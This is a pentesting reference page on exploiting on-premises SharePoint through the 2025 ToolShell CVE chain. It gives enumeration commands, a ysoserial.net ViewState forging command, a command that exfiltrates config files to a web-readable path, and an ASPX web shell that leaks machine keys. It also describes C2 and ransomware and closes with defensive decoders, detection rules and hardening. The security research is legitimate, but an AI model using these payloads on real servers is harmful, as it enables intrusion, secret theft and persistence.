Microsoft SharePoint – Pentesting & Exploitation


tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Microsoft SharePoint (on-premises) is built on top of ASP.NET/IIS. Most of the classic web attack surface (ViewState, Web.Config, web shells, etc.) is therefore present, but SharePoint also ships with hundreds of proprietary ASPX pages and web services that dramatically enlarge the exposed attack surface. This page collects practical tricks to enumerate, exploit and persist inside SharePoint environments with emphasis on the 2025 exploit chain disclosed by Unit42 (CVE-2025-49704/49706/53770/53771).

1. Quick enumeration

# favicon hash and keywords
curl -s https://<host>/_layouts/15/images/SharePointHome.png
curl -s https://<host>/_vti_bin/client.svc | file -  # returns WCF/XSI

# version leakage (often in JS)
curl -s https://<host>/_layouts/15/init.js | grep -i "spPageContextInfo"

# interesting standard paths
/_layouts/15/ToolPane.aspx               # vulnerable page used in 2025 exploit chain
/_vti_bin/Lists.asmx                     # legacy SOAP service
/_catalogs/masterpage/Forms/AllItems.aspx

# enumerate sites & site-collections (requires at least Anonymous)
python3 Office365-ADFSBrute/SharePointURLBrute.py -u https://<host>

2. 2025 exploit chain (a.k.a. "ToolShell")

2.1 CVE-2025-49704 – Code Injection on ToolPane.aspx

/_layouts/15/ToolPane.aspx?PageView=…&DefaultWebPartId=<payload> allows arbitrary Server-Side Include code to be injected into the page, which ASP.NET later compiles. An attacker can embed C# that calls Process.Start() and drops a malicious ViewState.

2.2 CVE-2025-49706 – Improper Authentication Bypass

The same page trusts the X-Forms_BaseUrl header to determine the site context. By pointing it to /_layouts/15/, MFA/SSO enforced at the root site can be bypassed unauthenticated.

2.3 CVE-2025-53770 – Unauthenticated ViewState Deserialization → RCE

Once the attacker controls a gadget in ToolPane.aspx, they can post an unsigned (or MAC-only) __VIEWSTATE value that triggers .NET deserialization inside w3wp.exe, leading to code execution.

If signing is enabled, steal the ValidationKey/DecryptionKey from any web.config (see 2.4) and forge the payload with ysoserial.net or ysodom:

ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" |
    ViewStateGenerator.exe --validation-key <hex> --decryption-key <hex> -o payload.txt

For an in-depth explanation on abusing ASP.NET ViewState read:

Exploiting __VIEWSTATE without knowing the secrets

2.4 CVE-2025-53771 – Path Traversal / web.config Disclosure

Sending a crafted Source parameter to ToolPane.aspx (e.g. ../../../../web.config) returns the targeted file, allowing leakage of:

  • <machineKey validationKey="…" decryptionKey="…"> ➜ forge ViewState / ASPXAUTH cookies
  • connection strings & secrets.

3. Post-exploitation recipes observed in the wild

3.1 Exfiltrate every .config file (variation-1)

cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js"

The resulting debug_dev.js can be downloaded anonymously and contains all sensitive configuration.

3.2 Deploy a Base64-encoded ASPX web shell (variation-2)

powershell.exe -EncodedCommand <base64>

Decoded payload example (shortened):

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Security.Cryptography" %>
<script runat="server">
    protected void Page_Load(object sender, EventArgs e){
        Response.Write(MachineKey.ValidationKey);
        // echo secrets or invoke cmd
    }
</script>

Written to:

C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

The shell exposes endpoints to read / rotate machine keys which allows forging ViewState and ASPXAUTH cookies across the farm.

3.3 Obfuscated variant (variation-3)

Same shell but:

  • dropped under ...\15\TEMPLATE\LAYOUTS\
  • variable names reduced to single letters
  • Thread.Sleep(<ms>) added for sandbox-evasion & timing-based AV bypass.

3.4 AK47C2 multi-protocol backdoor & X2ANYLOCK ransomware (observed 2025-2026)

Recent incident-response investigations (Unit42 "Project AK47") show how attackers leverage the ToolShell chain after initial RCE to deploy a dual-channel C2 implant and ransomware in SharePoint environments:

AK47C2 – dnsclient variant

  • Hard-coded DNS server: 10.7.66.10 communicating with authoritative domain update.updatemicfosoft.com.

  • Messages are JSON objects XOR-encrypted with the static key VHBD@H, hex-encoded and embedded as sub-domain labels.

    {"cmd":"<COMMAND>","cmd_id":"<ID>"}
    
  • Long queries are chunked and prefixed with s, then re-assembled server-side.

  • Server replies in TXT records carrying the same XOR/hex scheme:

    {"cmd":"<COMMAND>","cmd_id":"<ID>","type":"result","fqdn":"<HOST>","result":"<OUTPUT>"}
    
  • Version 202504 introduced a simplified format <COMMAND>::<SESSION_KEY> and chunk markers 1, 2, a.
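The dnsclient encoding described above, as an added analyst-side decoder that is not from the Unit42 report or from the implant itself: it strips the C2 zone, removes the s chunk marker, hex-decodes, XORs with the static key VHBD@H and parses both the JSON format and the simplified 202504 <COMMAND>::<SESSION_KEY> format. The constructed sample query (one hex chunk per label, each prefixed with s) is an assumption about label layout, and because the httpclient variant reuses the same XOR/hex routine, the same xor_bytes/parse_plaintext pair decodes its POST body.

```python
import json

XOR_KEY = b"VHBD@H"                     # static key reported for AK47C2
C2_ZONE = "update.updatemicfosoft.com"   # authoritative domain from the report
CHUNK_MARKER = "s"                       # continuation prefix from the report

# Constructed sample query (not captured traffic): hex payload split over two
# labels, each prefixed with the chunk marker. This label layout is an assumption.
SAMPLE_QUERY = ("s2d6a2129246a6c6a352c2f293b216068."
                "s622b3b2c1d2d246a6c6a73663d." + C2_ZONE)


def xor_bytes(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR; symmetric, so one routine encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def payload_labels(qname: str, zone: str = C2_ZONE):
    """Sub-domain labels carrying the payload, or None if not for the C2 zone."""
    q = qname.rstrip(".").lower()
    if not q.endswith("." + zone):
        return None
    return q[: -(len(zone) + 1)].split(".")


def reassemble(labels) -> bytes:
    """Drop the chunk marker from each label, join, and hex-decode the blob."""
    blob = "".join(lab[len(CHUNK_MARKER):] if lab.startswith(CHUNK_MARKER) else lab
                   for lab in labels)
    return bytes.fromhex(blob)


def parse_plaintext(text: str) -> dict:
    if text.startswith("{"):                  # JSON task/result format
        return json.loads(text)
    if "::" in text:                          # simplified 202504 format
        cmd, _, session = text.partition("::")
        return {"cmd": cmd, "session_key": session}
    return {"raw": text}


def decode_query(qname: str):
    """Decode one DNS query name; None when it is not C2 traffic."""
    labels = payload_labels(qname)
    if labels is None:
        return None
    try:
        plain = xor_bytes(reassemble(labels)).decode("utf-8")
    except ValueError:                        # bad hex or wrong key
        return {"raw_hex": "".join(labels)}
    return parse_plaintext(plain)


if __name__ == "__main__":
    print(decode_query(SAMPLE_QUERY))
```

Feed it the QNAME column of your DNS logs filtered on the C2 zone; anything that decodes to a cmd/cmd_id object is a task being issued to a host.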

AK47C2 – httpclient variant

  • Re-uses the exact JSON & XOR routine but sends the hex blob in the HTTP POST body via libcurl (CURLOPT_POSTFIELDS, etc.).
  • Same task/result workflow allowing:
    • Arbitrary shell command execution.
    • Dynamic sleep interval and kill-switch instructions.

X2ANYLOCK ransomware

  • 64-bit C++ payload loaded through DLL side-loading (see below).

  • Employs AES-CBC for file data + RSA-2048 to wrap the AES key, then appends the extension .x2anylock.

  • Recursively encrypts local drives and discovered SMB shares; skips system paths.

  • Drops clear-text note How to decrypt my data.txt embedding a static Tox ID for negotiations.

  • Contains an internal kill-switch:

    if (file_mod_time >= "2026-06-06") exit(0);
    

DLL side-loading chain

  1. Attacker writes dllhijacked.dll/My7zdllhijacked.dll next to a legitimate 7z.exe.
  2. SharePoint-spawned w3wp.exe launches 7z.exe, which loads the malicious DLL because of the Windows DLL search order, invoking the ransomware entrypoint in memory.
  3. A separate LockBit loader observed (bbb.msi ➜ clink_x86.exe ➜ clink_dll_x86.dll) decrypts shell-code and performs DLL hollowing into d3dl1.dll to run LockBit 3.0.

info

The same static Tox ID found in X2ANYLOCK appears in leaked LockBit databases, suggesting affiliate overlap.


4. Detection ideas

Telemetry                                                | Why it is suspicious
---------------------------------------------------------|--------------------------------------------
w3wp.exe → cmd.exe                                       | Worker process should rarely spawn a shell
cmd.exe → powershell.exe -EncodedCommand                 | Classic lolbin pattern
File events creating debug_dev.js or spinstall0.aspx     | IOCs straight from ToolShell
ProcessCmdLine CONTAINS ToolPane.aspx (ETW/Module logs)  | Public PoCs invoke this page

Example XDR / Sysmon rule (pseudo-XQL):

proc where parent_process_name="w3wp.exe" and process_name in ("cmd.exe","powershell.exe")
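The table and pseudo-XQL above, as an added Python example that is not from the page or any vendor product: it applies the same indicators to constructed process-create, file-create and IIS request events. The event field names and the sample events are assumptions about a normalised collector format, and the request rule covers the ToolPane.aspx path that section 5 recommends blocking.

```python
import re

SHELLS = {"cmd.exe", "powershell.exe"}
TOOLSHELL_FILES = {"debug_dev.js", "spinstall0.aspx"}   # file names from the ToolShell variations
# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -enc)
ENCODED_RE = re.compile(r"\s-(?:encodedcommand|enc|ec|e)\s", re.IGNORECASE)

# Constructed sample telemetry (not real logs), in an assumed normalised schema.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "w3wp.exe", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c for /R C:\\inetpub\\wwwroot %i in (*.config) do @type "%i"'},
    {"type": "process", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand <base64-placeholder>"},
    {"type": "file", "image": "w3wp.exe",
     "path": "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions"
             "\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx"},
    {"type": "process", "parent": "w3wp.exe", "image": "conhost.exe", "cmdline": "conhost.exe 0x4"},
    {"type": "request", "method": "POST", "url": "/_layouts/15/ToolPane.aspx?DisplayMode=Edit",
     "status": 200, "client": "203.0.113.5"},
    {"type": "process", "parent": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c dir"},
]


def scan(events):
    """Return (rule, evidence) tuples for every event that matches a ToolShell indicator."""
    hits = []
    for ev in events:
        kind = ev.get("type")
        if kind == "process":
            parent, image = ev["parent"].lower(), ev["image"].lower()
            cmdline = ev.get("cmdline", "")
            if parent == "w3wp.exe" and image in SHELLS:
                hits.append(("w3wp_spawns_shell", cmdline))
            if parent == "cmd.exe" and image == "powershell.exe" and ENCODED_RE.search(cmdline):
                hits.append(("encoded_powershell", cmdline))
            if "toolpane.aspx" in cmdline.lower():
                hits.append(("toolpane_in_cmdline", cmdline))
        elif kind == "file":
            name = ev["path"].replace("\\", "/").rsplit("/", 1)[-1].lower()
            if name in TOOLSHELL_FILES:
                hits.append(("toolshell_file_written", ev["path"]))
        elif kind == "request":
            if ev.get("method") == "POST" and "/_layouts/15/toolpane.aspx" in ev["url"].lower():
                hits.append(("toolpane_post", f'{ev.get("client")} {ev["url"]}'))
    return hits


if __name__ == "__main__":
    for rule, evidence in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {evidence}")
```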

5. Hardening & Mitigation

  1. Patch – July 2025 security updates fix all four CVEs.
  2. Rotate every <machineKey> and ViewState secrets after compromise.
  3. Remove LAYOUTS write permission from WSS_WPG & WSS_ADMIN_WPG groups.
  4. Block external access to /_layouts/15/ToolPane.aspx at proxy/WAF level.
  5. Enable ViewStateUserKey, keep ViewState MAC validation enabled, and use custom EventValidation.
  • IIS post-exploitation & web.config abuse:

IIS - Internet Information Services
